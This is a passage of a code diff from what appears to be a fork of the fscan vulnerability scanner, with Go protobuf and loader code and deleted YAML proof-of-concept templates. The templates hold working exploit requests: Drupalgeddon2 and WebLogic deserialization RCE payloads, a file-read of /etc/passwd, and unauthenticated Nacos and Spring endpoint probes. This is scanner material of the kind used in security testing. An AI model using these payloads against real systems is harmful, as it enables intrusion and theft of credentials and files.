ContentType string `protobuf:"bytes,4,opt,name=content_type,json=contentType,proto3" json:"content_type,omitempty"`
|
||||
Body []byte `protobuf:"bytes,5,opt,name=body,proto3" json:"body,omitempty"`
|
||||
XXX_NoUnkeyedLiteral struct{} `json:"-"`
|
||||
XXX_unrecognized []byte `json:"-"`
|
||||
XXX_sizecache int32 `json:"-"`
|
||||
}
|
||||
|
||||
func (m *Response) Reset() { *m = Response{} }
|
||||
func (m *Response) String() string { return proto.CompactTextString(m) }
|
||||
func (*Response) ProtoMessage() {}
|
||||
func (*Response) Descriptor() ([]byte, []int) {
|
||||
return fileDescriptor_11b04836674e6f94, []int{2}
|
||||
}
|
||||
|
||||
func (m *Response) XXX_Unmarshal(b []byte) error {
|
||||
return xxx_messageInfo_Response.Unmarshal(m, b)
|
||||
}
|
||||
func (m *Response) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
|
||||
return xxx_messageInfo_Response.Marshal(b, m, deterministic)
|
||||
}
|
||||
func (m *Response) XXX_Merge(src proto.Message) {
|
||||
xxx_messageInfo_Response.Merge(m, src)
|
||||
}
|
||||
func (m *Response) XXX_Size() int {
|
||||
return xxx_messageInfo_Response.Size(m)
|
||||
}
|
||||
func (m *Response) XXX_DiscardUnknown() {
|
||||
xxx_messageInfo_Response.DiscardUnknown(m)
|
||||
}
|
||||
|
||||
var xxx_messageInfo_Response proto.InternalMessageInfo
|
||||
|
||||
func (m *Response) GetUrl() *UrlType {
|
||||
if m != nil {
|
||||
return m.Url
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (m *Response) GetStatus() int32 {
|
||||
if m != nil {
|
||||
return m.Status
|
||||
}
|
||||
return 0
|
||||
}
|
||||
|
||||
func (m *Response) GetHeaders() map[string]string {
|
||||
if m != nil {
|
||||
return m.Headers
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (m *Response) GetContentType() string {
|
||||
if m != nil {
|
||||
return m.ContentType
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func (m *Response) GetBody() []byte {
|
||||
if m != nil {
|
||||
return m.Body
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
type Reverse struct {
|
||||
Url *UrlType `protobuf:"bytes,1,opt,name=url,proto3" json:"url,omitempty"`
|
||||
Domain string `protobuf:"bytes,2,opt,name=domain,proto3" json:"domain,omitempty"`
|
||||
Ip string `protobuf:"bytes,3,opt,name=ip,proto3" json:"ip,omitempty"`
|
||||
IsDomainNameServer bool `protobuf:"varint,4,opt,name=is_domain_name_server,json=isDomainNameServer,proto3" json:"is_domain_name_server,omitempty"`
|
||||
XXX_NoUnkeyedLiteral struct{} `json:"-"`
|
||||
XXX_unrecognized []byte `json:"-"`
|
||||
XXX_sizecache int32 `json:"-"`
|
||||
}
|
||||
|
||||
func (m *Reverse) Reset() { *m = Reverse{} }
|
||||
func (m *Reverse) String() string { return proto.CompactTextString(m) }
|
||||
func (*Reverse) ProtoMessage() {}
|
||||
func (*Reverse) Descriptor() ([]byte, []int) {
|
||||
return fileDescriptor_11b04836674e6f94, []int{3}
|
||||
}
|
||||
|
||||
func (m *Reverse) XXX_Unmarshal(b []byte) error {
|
||||
return xxx_messageInfo_Reverse.Unmarshal(m, b)
|
||||
}
|
||||
func (m *Reverse) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) {
|
||||
return xxx_messageInfo_Reverse.Marshal(b, m, deterministic)
|
||||
}
|
||||
func (m *Reverse) XXX_Merge(src proto.Message) {
|
||||
xxx_messageInfo_Reverse.Merge(m, src)
|
||||
}
|
||||
func (m *Reverse) XXX_Size() int {
|
||||
return xxx_messageInfo_Reverse.Size(m)
|
||||
}
|
||||
func (m *Reverse) XXX_DiscardUnknown() {
|
||||
xxx_messageInfo_Reverse.DiscardUnknown(m)
|
||||
}
|
||||
|
||||
var xxx_messageInfo_Reverse proto.InternalMessageInfo
|
||||
|
||||
func (m *Reverse) GetUrl() *UrlType {
|
||||
if m != nil {
|
||||
return m.Url
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (m *Reverse) GetDomain() string {
|
||||
if m != nil {
|
||||
return m.Domain
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func (m *Reverse) GetIp() string {
|
||||
if m != nil {
|
||||
return m.Ip
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func (m *Reverse) GetIsDomainNameServer() bool {
|
||||
if m != nil {
|
||||
return m.IsDomainNameServer
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
func init() {
|
||||
proto.RegisterType((*UrlType)(nil), "lib.UrlType")
|
||||
proto.RegisterType((*Request)(nil), "lib.Request")
|
||||
proto.RegisterMapType((map[string]string)(nil), "lib.Request.HeadersEntry")
|
||||
proto.RegisterType((*Response)(nil), "lib.Response")
|
||||
proto.RegisterMapType((map[string]string)(nil), "lib.Response.HeadersEntry")
|
||||
proto.RegisterType((*Reverse)(nil), "lib.Reverse")
|
||||
}
|
||||
|
||||
func init() {
|
||||
proto.RegisterFile("http.proto", fileDescriptor_11b04836674e6f94)
|
||||
}
|
||||
|
||||
var fileDescriptor_11b04836674e6f94 = []byte{
|
||||
// 378 bytes of a gzipped FileDescriptorProto
|
||||
0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0xff, 0xcc, 0x93, 0xb1, 0x8e, 0xd3, 0x40,
|
||||
0x10, 0x86, 0x65, 0x3b, 0x89, 0xc3, 0xc4, 0x42, 0x68, 0x05, 0x68, 0x49, 0x81, 0x8e, 0x54, 0x57,
|
||||
0x59, 0xe2, 0x8e, 0x02, 0x5d, 0x0d, 0x12, 0x15, 0xc5, 0x02, 0xb5, 0xb5, 0x3e, 0x0f, 0xd8, 0xc2,
|
||||
0xf6, 0x6e, 0x76, 0xc7, 0x91, 0xdc, 0xf3, 0x2e, 0x3c, 0x1b, 0xe2, 0x25, 0x90, 0x67, 0x37, 0x08,
|
||||
0x21, 0x8a, 0x94, 0x74, 0xf3, 0xff, 0xbf, 0x3d, 0x9a, 0x6f, 0x3c, 0x06, 0x68, 0x89, 0x6c, 0x69,
|
||||
0x9d, 0x21, 0x23, 0xb2, 0xbe, 0xab, 0x0f, 0xdf, 0x13, 0xc8, 0x3f, 0xb9, 0xfe, 0xe3, 0x6c, 0x51,
|
||||
0x3c, 0x85, 0x8d, 0xbf, 0x6f, 0x71, 0x40, 0x99, 0x5c, 0x25, 0xd7, 0x0f, 0x54, 0x54, 0x8b, 0xdf,
|
||||
0x98, 0x41, 0x77, 0xa3, 0x4c, 0x83, 0x1f, 0x94, 0x10, 0xb0, 0x6a, 0x8d, 0x27, 0x99, 0xb1, 0xcb,
|
||||
0xf5, 0xe2, 0x59, 0xe3, 0x48, 0xae, 0x82, 0xb7, 0xd4, 0xec, 0x69, 0x6a, 0xe5, 0x3a, 0x7a, 0x9a,
|
||||
0x5a, 0xf1, 0x18, 0xd6, 0xc7, 0x09, 0xdd, 0x2c, 0x37, 0x6c, 0x06, 0x21, 0xf6, 0xb0, 0xfd, 0xec,
|
||||
0xf4, 0x97, 0x01, 0x47, 0x92, 0x39, 0x07, 0xbf, 0xf5, 0xe1, 0x47, 0x02, 0xb9, 0xc2, 0xe3, 0x84,
|
||||
0x9e, 0xc4, 0x73, 0xc8, 0x26, 0xd7, 0xf3, 0x98, 0xbb, 0x9b, 0xa2, 0xec, 0xbb, 0xba, 0x8c, 0x10,
|
||||
0x6a, 0x09, 0x96, 0x89, 0x07, 0xa4, 0xd6, 0x34, 0xe7, 0x89, 0x83, 0x12, 0xb7, 0x90, 0xb7, 0xa8,
|
||||
0x1b, 0x74, 0x5e, 0x66, 0x57, 0xd9, 0xf5, 0xee, 0xe6, 0x19, 0xbf, 0x1b, 0xdb, 0x96, 0xef, 0x42,
|
||||
0xf6, 0x76, 0x24, 0x37, 0xab, 0xf3, 0x93, 0xe2, 0x05, 0x14, 0xf7, 0x66, 0x24, 0x1c, 0xa9, 0xa2,
|
||||
0xd9, 0x62, 0x44, 0xdb, 0x45, 0x8f, 0x37, 0x27, 0x60, 0x55, 0x9b, 0x66, 0x66, 0xc2, 0x42, 0x71,
|
||||
0xbd, 0xbf, 0x83, 0xe2, 0xcf, 0x7e, 0xe2, 0x11, 0x64, 0x5f, 0x71, 0x8e, 0xab, 0x5d, 0xca, 0x65,
|
||||
0x07, 0x27, 0xdd, 0x4f, 0x18, 0x87, 0x0c, 0xe2, 0x2e, 0x7d, 0x9d, 0x1c, 0x7e, 0x26, 0xb0, 0x55,
|
||||
0xe8, 0xad, 0x19, 0x3d, 0x5e, 0x02, 0xeb, 0x49, 0xd3, 0xe4, 0xb9, 0xcf, 0x5a, 0x45, 0x25, 0x5e,
|
||||
0xfd, 0x0d, 0xbb, 0x8f, 0xb0, 0xa1, 0xef, 0xff, 0x43, 0xfb, 0x8d, 0xbf, 0xec, 0x09, 0xdd, 0x65,
|
||||
0xb0, 0xff, 0xbc, 0xc5, 0x87, 0x90, 0x76, 0x36, 0x5e, 0x62, 0xda, 0x59, 0xf1, 0x12, 0x9e, 0x74,
|
||||
0xbe, 0x0a, 0x61, 0x35, 0xea, 0x01, 0x2b, 0x8f, 0xee, 0x84, 0x8e, 0x79, 0xb6, 0x4a, 0x74, 0xfe,
|
||||
0x0d, 0x67, 0xef, 0xf5, 0x80, 0x1f, 0x38, 0xa9, 0x37, 0xfc, 0x5b, 0xdc, 0xfe, 0x0a, 0x00, 0x00,
|
||||
0xff, 0xff, 0x2a, 0xe0, 0x6d, 0x45, 0x24, 0x03, 0x00, 0x00,
|
||||
}
|
|
@ -1,70 +0,0 @@
|
|||
package lib
|
||||
|
||||
import (
|
||||
"embed"
|
||||
"fmt"
|
||||
"gopkg.in/yaml.v3"
|
||||
"strings"
|
||||
)
|
||||
|
||||
type Poc struct {
|
||||
Name string `yaml:"name"`
|
||||
Set map[string]string `yaml:"set"`
|
||||
Rules []Rules `yaml:"rules"`
|
||||
Detail Detail `yaml:"detail"`
|
||||
}
|
||||
|
||||
type Rules struct {
|
||||
Method string `yaml:"method"`
|
||||
Path string `yaml:"path"`
|
||||
Headers map[string]string `yaml:"headers"`
|
||||
Body string `yaml:"body"`
|
||||
Search string `yaml:"search"`
|
||||
FollowRedirects bool `yaml:"follow_redirects"`
|
||||
Expression string `yaml:"expression"`
|
||||
}
|
||||
|
||||
type Detail struct {
|
||||
Author string `yaml:"author"`
|
||||
Links []string `yaml:"links"`
|
||||
Description string `yaml:"description"`
|
||||
Version string `yaml:"version"`
|
||||
}
|
||||
|
||||
func LoadMultiPoc(Pocs embed.FS, pocname string) []*Poc {
|
||||
var pocs []*Poc
|
||||
for _, f := range SelectPoc(Pocs, pocname) {
|
||||
if p, err := loadPoc(f, Pocs); err == nil {
|
||||
pocs = append(pocs, p)
|
||||
}
|
||||
}
|
||||
return pocs
|
||||
}
|
||||
|
||||
func loadPoc(fileName string, Pocs embed.FS) (*Poc, error) {
|
||||
p := &Poc{}
|
||||
yamlFile, err := Pocs.ReadFile("pocs/" + fileName)
|
||||
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
err = yaml.Unmarshal(yamlFile, p)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
return p, err
|
||||
}
|
||||
|
||||
func SelectPoc(Pocs embed.FS, pocname string) []string {
|
||||
entries, err := Pocs.ReadDir("pocs")
|
||||
if err != nil {
|
||||
fmt.Println(err)
|
||||
}
|
||||
var foundFiles []string
|
||||
for _, entry := range entries {
|
||||
if strings.Contains(entry.Name(), pocname) {
|
||||
foundFiles = append(foundFiles, entry.Name())
|
||||
}
|
||||
}
|
||||
return foundFiles
|
||||
}
|
|
@ -1,15 +0,0 @@
|
|||
name: poc-yaml-alibaba-nacos-api-unauth
|
||||
rules:
|
||||
- method: GET
|
||||
path: /nacos/v1/auth/users?pageNo=1&pageSize=9
|
||||
headers:
|
||||
User-Agent: Nacos-Server
|
||||
follow_redirects: true
|
||||
expression: |
|
||||
response.content_type.contains("application/json") && response.body.bcontains(bytes("totalCount")) && response.body.bcontains(bytes("pagesAvailable")) && response.body.bcontains(bytes("username")) && response.body.bcontains(bytes("password"))
|
||||
detail:
|
||||
author: AgeloVito
|
||||
info: alibaba-nacos-api-unauth
|
||||
login: nacos/nacos
|
||||
links:
|
||||
- https://blog.csdn.net/caiqiiqi/article/details/112005424
|
|
@ -1,28 +0,0 @@
|
|||
name: poc-yaml-drupal-drupalgeddon2-rce # nolint[:namematch]
|
||||
set:
|
||||
r1: randomLowercase(4)
|
||||
r2: randomLowercase(4)
|
||||
rules:
|
||||
- method: POST
|
||||
path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}"
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
body: |
|
||||
form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password
|
||||
search: |
|
||||
name="form_build_id"\s+value="(?P<build_id>.+?)"
|
||||
expression: |
|
||||
response.status == 200
|
||||
- method: POST
|
||||
path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}"
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
body: |
|
||||
form_build_id={{build_id}}
|
||||
expression: |
|
||||
response.body.bcontains(bytes(r1 + "%" + r2))
|
||||
detail:
|
||||
drupal_version: 7
|
||||
links:
|
||||
- https://github.com/dreadlocked/Drupalgeddon2
|
||||
- https://paper.seebug.org/567/
|
|
@ -1,20 +0,0 @@
|
|||
name: poc-yaml-drupal-drupalgeddon2-rce # nolint[:namematch]
|
||||
set:
|
||||
r1: randomLowercase(4)
|
||||
r2: randomLowercase(4)
|
||||
rules:
|
||||
- method: POST
|
||||
path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
body: |
|
||||
form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}}
|
||||
expression: |
|
||||
response.body.bcontains(bytes(r1 + "%" + r2))
|
||||
detail:
|
||||
drupal_version: 8
|
||||
links:
|
||||
- https://github.com/dreadlocked/Drupalgeddon2
|
||||
- https://paper.seebug.org/567/
|
||||
test:
|
||||
target: http://cve-2018-7600-8-x.vulnet:8080/
|
|
@ -1,12 +0,0 @@
|
|||
name: poc-yaml-spring-heapdump-file
|
||||
rules:
|
||||
- method: HEAD
|
||||
path: /heapdump
|
||||
follow_redirects: true
|
||||
expression: |
|
||||
response.status == 200 && response.content_type.contains("application/octet-stream")
|
||||
detail:
|
||||
author: AgeloVito
|
||||
info: spring-heapdump-file
|
||||
links:
|
||||
- https://www.cnblogs.com/wyb628/p/8567610.html
|
|
@ -1,10 +0,0 @@
|
|||
name: poc-yaml-druid-monitor-unauth
|
||||
rules:
|
||||
- method: GET
|
||||
path: /swagger-ui.html
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
|
||||
detail:
|
||||
author: AgeloVito
|
||||
links:
|
||||
- https://blog.csdn.net/u012206617/article/details/109107210
|
|
@ -1,10 +0,0 @@
|
|||
name: poc-yaml-druid-monitor-unauth
|
||||
rules:
|
||||
- method: GET
|
||||
path: /api/swagger-ui.html
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
|
||||
detail:
|
||||
author: AgeloVito
|
||||
links:
|
||||
- https://blog.csdn.net/u012206617/article/details/109107210
|
|
@ -1,10 +0,0 @@
|
|||
name: poc-yaml-druid-monitor-unauth
|
||||
rules:
|
||||
- method: GET
|
||||
path: /service/swagger-ui.html
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
|
||||
detail:
|
||||
author: AgeloVito
|
||||
links:
|
||||
- https://blog.csdn.net/u012206617/article/details/109107210
|
|
@ -1,10 +0,0 @@
|
|||
name: poc-yaml-druid-monitor-unauth
|
||||
rules:
|
||||
- method: GET
|
||||
path: /web/swagger-ui.html
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
|
||||
detail:
|
||||
author: AgeloVito
|
||||
links:
|
||||
- https://blog.csdn.net/u012206617/article/details/109107210
|
|
@ -1,10 +0,0 @@
|
|||
name: poc-yaml-druid-monitor-unauth
|
||||
rules:
|
||||
- method: GET
|
||||
path: /swagger/swagger-ui.html
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
|
||||
detail:
|
||||
author: AgeloVito
|
||||
links:
|
||||
- https://blog.csdn.net/u012206617/article/details/109107210
|
|
@ -1,10 +0,0 @@
|
|||
name: poc-yaml-druid-monitor-unauth
|
||||
rules:
|
||||
- method: GET
|
||||
path: /actuator/swagger-ui.html
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
|
||||
detail:
|
||||
author: AgeloVito
|
||||
links:
|
||||
- https://blog.csdn.net/u012206617/article/details/109107210
|
|
@ -1,10 +0,0 @@
|
|||
name: poc-yaml-druid-monitor-unauth
|
||||
rules:
|
||||
- method: GET
|
||||
path: /libs/swagger-ui.html
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
|
||||
detail:
|
||||
author: AgeloVito
|
||||
links:
|
||||
- https://blog.csdn.net/u012206617/article/details/109107210
|
|
@ -1,10 +0,0 @@
|
|||
name: poc-yaml-druid-monitor-unauth
|
||||
rules:
|
||||
- method: GET
|
||||
path: /template/swagger-ui.html
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js")
|
||||
detail:
|
||||
author: AgeloVito
|
||||
links:
|
||||
- https://blog.csdn.net/u012206617/article/details/109107210
|
|
@ -1,19 +0,0 @@
|
|||
name: poc-yaml-weaver-ebridge-file-read-linux
|
||||
rules:
|
||||
- method: GET
|
||||
path: "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt"
|
||||
follow_redirects: false
|
||||
expression: |
|
||||
response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"id")
|
||||
search: |
|
||||
\"id\"\:\"(?P<var>.+?)\"\,
|
||||
- method: GET
|
||||
path: "/file/fileNoLogin/{{var}}"
|
||||
follow_redirects: false
|
||||
expression: |
|
||||
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
|
||||
detail:
|
||||
author: mvhz81
|
||||
info: e-bridge-file-read for Linux
|
||||
links:
|
||||
- https://mrxn.net/Infiltration/323.html
|
|
@ -1,19 +0,0 @@
|
|||
name: poc-yaml-weaver-ebridge-file-read-windows
|
||||
rules:
|
||||
- method: GET
|
||||
path: /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt
|
||||
follow_redirects: false
|
||||
expression: |
|
||||
response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"id")
|
||||
search: |
|
||||
\"id\"\:\"(?P<var>.+?)\"\,
|
||||
- method: GET
|
||||
path: /file/fileNoLogin/{{var}}
|
||||
follow_redirects: false
|
||||
expression: |
|
||||
response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]"))
|
||||
detail:
|
||||
author: mvhz81
|
||||
info: e-bridge-file-read for windows
|
||||
links:
|
||||
- https://mrxn.net/Infiltration/323.html
|
|
@ -1,20 +0,0 @@
|
|||
name: poc-yaml-weblogic-cve-2017-10271 # nolint[:namematch]
|
||||
rules:
|
||||
- method: POST
|
||||
path: /wls-wsat/CoordinatorPortType
|
||||
headers:
|
||||
Content-Type: text/xml
|
||||
body: >-
|
||||
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><void class="java.lang.Thread" method="currentThread"><void method="getCurrentWork"><void method="getResponse"><void method="getServletOutputStream"><void method="write"><array class="byte" length="9"><void index="0"><byte>50</byte></void><void index="1"><byte>50</byte></void><void index="2"><byte>53</byte></void><void index="3"><byte>55</byte></void><void index="4"><byte>55</byte></void><void index="5"><byte>51</byte></void><void index="6"><byte>48</byte></void><void index="7"><byte>57</byte></void><void index="8"><byte>49</byte></void></array></void><void method="flush"/></void></void></void></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope></soapenv:Envelope>
|
||||
follow_redirects: true
|
||||
expression: >
|
||||
response.body.bcontains(b"225773091")
|
||||
detail:
|
||||
vulnpath: '/wls-wsat/CoordinatorPortType'
|
||||
author: fnmsd(https://github.com/fnmsd)
|
||||
description: 'Weblogic wls-wsat XMLDecoder deserialization RCE CVE-2017-10271'
|
||||
weblogic_version: '10'
|
||||
links:
|
||||
- https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271
|
||||
- https://github.com/QAX-A-Team/WeblogicEnvironment
|
||||
- https://xz.aliyun.com/t/5299
|
File diff suppressed because it is too large
Load Diff
|
@ -1,20 +0,0 @@
|
|||
name: poc-yaml-weblogic-cve-2019-2725 # nolint[:namematch]
|
||||
rules:
|
||||
- method: POST
|
||||
path: /wls-wsat/CoordinatorPortType
|
||||
headers:
|
||||
Content-Type: text/xml
|
||||
body: >-
|
||||
<?xml version="1.0" encoding="utf-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>fff</wsa:Action><wsa:RelatesTo>hello</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><string><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java><void class="java.lang.Thread" method="currentThread"><void method="getCurrentWork" id="current_work"><void method="getClass"><void method="getDeclaredField"><string>connectionHandler</string><void method="setAccessible"><boolean>true</boolean></void><void method="get"><object idref="current_work"/><void method="getServletRequest"><void method="getResponse"><void method="getServletOutputStream"><void method="write"><array class="byte" length="9"><void index="0"><byte>50</byte></void><void index="1"><byte>50</byte></void><void index="2"><byte>53</byte></void><void index="3"><byte>55</byte></void><void index="4"><byte>55</byte></void><void index="5"><byte>51</byte></void><void index="6"><byte>48</byte></void><void index="7"><byte>57</byte></void><void index="8"><byte>49</byte></void></array></void><void method="flush"/></void><void method="getWriter"><void method="write"><string/></void></void></void></void></void></void></void></void></void></java>]]></string></void></class></string></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
|
||||
follow_redirects: true
|
||||
expression: >
|
||||
response.body.bcontains(b"225773091")
|
||||
detail:
|
||||
vulnpath: '/wls-wsat/CoordinatorPortType'
|
||||
author: fnmsd(https://github.com/fnmsd),2357000166(https://github.com/2357000166)
|
||||
description: 'Weblogic wls-wsat XMLDecoder deserialization RCE CVE-2019-2725 + org.slf4j.ext.EventData'
|
||||
weblogic_version: '>12'
|
||||
links:
|
||||
- https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271
|
||||
- https://github.com/QAX-A-Team/WeblogicEnvironment
|
||||
- https://xz.aliyun.com/t/5299
|
|
@ -1,12 +1,11 @@
|
|||
package WebScan
|
||||
package Web_Scan
|
||||
|
||||
import (
|
||||
"crypto/md5"
|
||||
"fmt"
|
||||
"github.com/shadow1ng/fscan/WebScan/info"
|
||||
"github.com/shadow1ng/fscan/common"
|
||||
"example.com/fxscan/Web_Scan/info"
|
||||
"example.com/fxscan/common"
|
||||
"regexp"
|
||||
"strings"
|
||||
)
|
||||
|
||||
type CheckDatas struct {
|
||||
|
@ -14,11 +13,11 @@ type CheckDatas struct {
|
|||
Headers string
|
||||
}
|
||||
|
||||
func InfoCheck(Url string, CheckData []CheckDatas) {
|
||||
func InfoCheck(Url string, CheckData *[]CheckDatas) []string {
|
||||
var matched bool
|
||||
var infoname []string
|
||||
|
||||
for _, data := range CheckData {
|
||||
for _, data := range *CheckData {
|
||||
for _, rule := range info.RuleDatas {
|
||||
if rule.Type == "code" {
|
||||
matched, _ = regexp.MatchString(rule.Rule, string(data.Body))
|
||||
|
@ -29,19 +28,21 @@ func InfoCheck(Url string, CheckData []CheckDatas) {
|
|||
infoname = append(infoname, rule.Name)
|
||||
}
|
||||
}
|
||||
flag, name := CalcMd5(data.Body)
|
||||
//flag, name := CalcMd5(data.Body)
|
||||
|
||||
if flag == true {
|
||||
infoname = append(infoname, name)
|
||||
}
|
||||
//if flag == true {
|
||||
// infoname = append(infoname, name)
|
||||
//}
|
||||
}
|
||||
|
||||
infostr := RemoveMore(infoname)
|
||||
infoname = removeDuplicateElement(infoname)
|
||||
|
||||
if len(infoname) > 0 {
|
||||
result := fmt.Sprintf("[+] InfoScan:%-25v %s ", Url, infostr)
|
||||
result := fmt.Sprintf("[+] InfoScan: %-25v %s ", Url, infoname)
|
||||
common.LogSuccess(result)
|
||||
return infoname
|
||||
}
|
||||
return []string{""}
|
||||
}
|
||||
|
||||
func CalcMd5(Body []byte) (bool, string) {
|
||||
|
@ -55,15 +56,14 @@ func CalcMd5(Body []byte) (bool, string) {
|
|||
return false, ""
|
||||
}
|
||||
|
||||
func RemoveMore(a []string) (infostr string) {
|
||||
var ret []string
|
||||
for i := 0; i < len(a); i++ {
|
||||
if (i > 0 && a[i-1] == a[i]) || len(a[i]) == 0 {
|
||||
continue
|
||||
func removeDuplicateElement(languages []string) []string {
|
||||
result := make([]string, 0, len(languages))
|
||||
temp := map[string]struct{}{}
|
||||
for _, item := range languages {
|
||||
if _, ok := temp[item]; !ok {
|
||||
temp[item] = struct{}{}
|
||||
result = append(result, item)
|
||||
}
|
||||
ret = append(ret, a[i])
|
||||
}
|
||||
infostr = strings.ReplaceAll(fmt.Sprintf("%s ", ret), "[", "")
|
||||
infostr = strings.ReplaceAll(infostr, "]", "")
|
||||
return
|
||||
return result
|
||||
}
|
|
@ -0,0 +1,101 @@
|
|||
package Web_Scan
|
||||
|
||||
import (
|
||||
"embed"
|
||||
"fmt"
|
||||
"example.com/fxscan/Web_Scan/lib"
|
||||
"example.com/fxscan/common"
|
||||
"net/http"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
"sync"
|
||||
)
|
||||
|
||||
//go:embed pocs
|
||||
var Pocs embed.FS
|
||||
var once sync.Once
|
||||
var AllPocs []*lib.Poc
|
||||
|
||||
func Web_Scan(info *common.HostInfo) {
|
||||
once.Do(initpoc)
|
||||
var pocinfo = common.Pocinfo
|
||||
buf := strings.Split(info.Url, "/")
|
||||
pocinfo.Target = strings.Join(buf[:3], "/")
|
||||
|
||||
if pocinfo.PocName != "" {
|
||||
Execute(pocinfo)
|
||||
} else {
|
||||
for _, infostr := range info.Infostr {
|
||||
pocinfo.PocName = lib.CheckInfoPoc(infostr)
|
||||
Execute(pocinfo)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func Execute(PocInfo common.PocInfo) {
|
||||
req, err := http.NewRequest("GET", PocInfo.Target, nil)
|
||||
if err != nil {
|
||||
errlog := fmt.Sprintf("[-] webpocinit %v %v", PocInfo.Target, err)
|
||||
common.LogError(errlog)
|
||||
return
|
||||
}
|
||||
req.Header.Set("User-agent", common.UserAgent)
|
||||
req.Header.Set("Accept", common.Accept)
|
||||
req.Header.Set("Accept-Language", "zh-CN,zh;q=0.9")
|
||||
if common.Cookie != "" {
|
||||
req.Header.Set("Cookie", common.Cookie)
|
||||
}
|
||||
req.Header.Set("Connection", "close")
|
||||
pocs := filterPoc(PocInfo.PocName)
|
||||
lib.CheckMultiPoc(req, pocs, common.PocNum)
|
||||
}
|
||||
|
||||
func initpoc() {
|
||||
if common.PocPath == "" {
|
||||
entries, err := Pocs.ReadDir("pocs")
|
||||
if err != nil {
|
||||
fmt.Printf("[-] init poc error: %v", err)
|
||||
return
|
||||
}
|
||||
for _, one := range entries {
|
||||
path := one.Name()
|
||||
if strings.HasSuffix(path, ".yaml") || strings.HasSuffix(path, ".yml") {
|
||||
if poc, _ := lib.LoadPoc(path, Pocs); poc != nil {
|
||||
AllPocs = append(AllPocs, poc)
|
||||
}
|
||||
}
|
||||
}
|
||||
} else {
|
||||
err := filepath.Walk(common.PocPath,
|
||||
func(path string, info os.FileInfo, err error) error {
|
||||
if err != nil || info == nil {
|
||||
return err
|
||||
}
|
||||
if !info.IsDir() {
|
||||
if strings.HasSuffix(path, ".yaml") || strings.HasSuffix(path, ".yml") {
|
||||
poc, _ := lib.LoadPocbyPath(path)
|
||||
if poc != nil {
|
||||
AllPocs = append(AllPocs, poc)
|
||||
}
|
||||
}
|
||||
}
|
||||
return nil
|
||||
})
|
||||
if err != nil {
|
||||
fmt.Printf("[-] init poc error: %v", err)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func filterPoc(pocname string) (pocs []*lib.Poc) {
|
||||
if pocname == "" {
|
||||
return AllPocs
|
||||
}
|
||||
for _, poc := range AllPocs {
|
||||
if strings.Contains(poc.Name, pocname) {
|
||||
pocs = append(pocs, poc)
|
||||
}
|
||||
}
|
||||
return
|
||||
}
|
|
@ -0,0 +1,313 @@
|
|||
package info
|
||||
|
||||
type RuleData struct {
|
||||
Name string
|
||||
Type string
|
||||
Rule string
|
||||
}
|
||||
|
||||
type Md5Data struct {
|
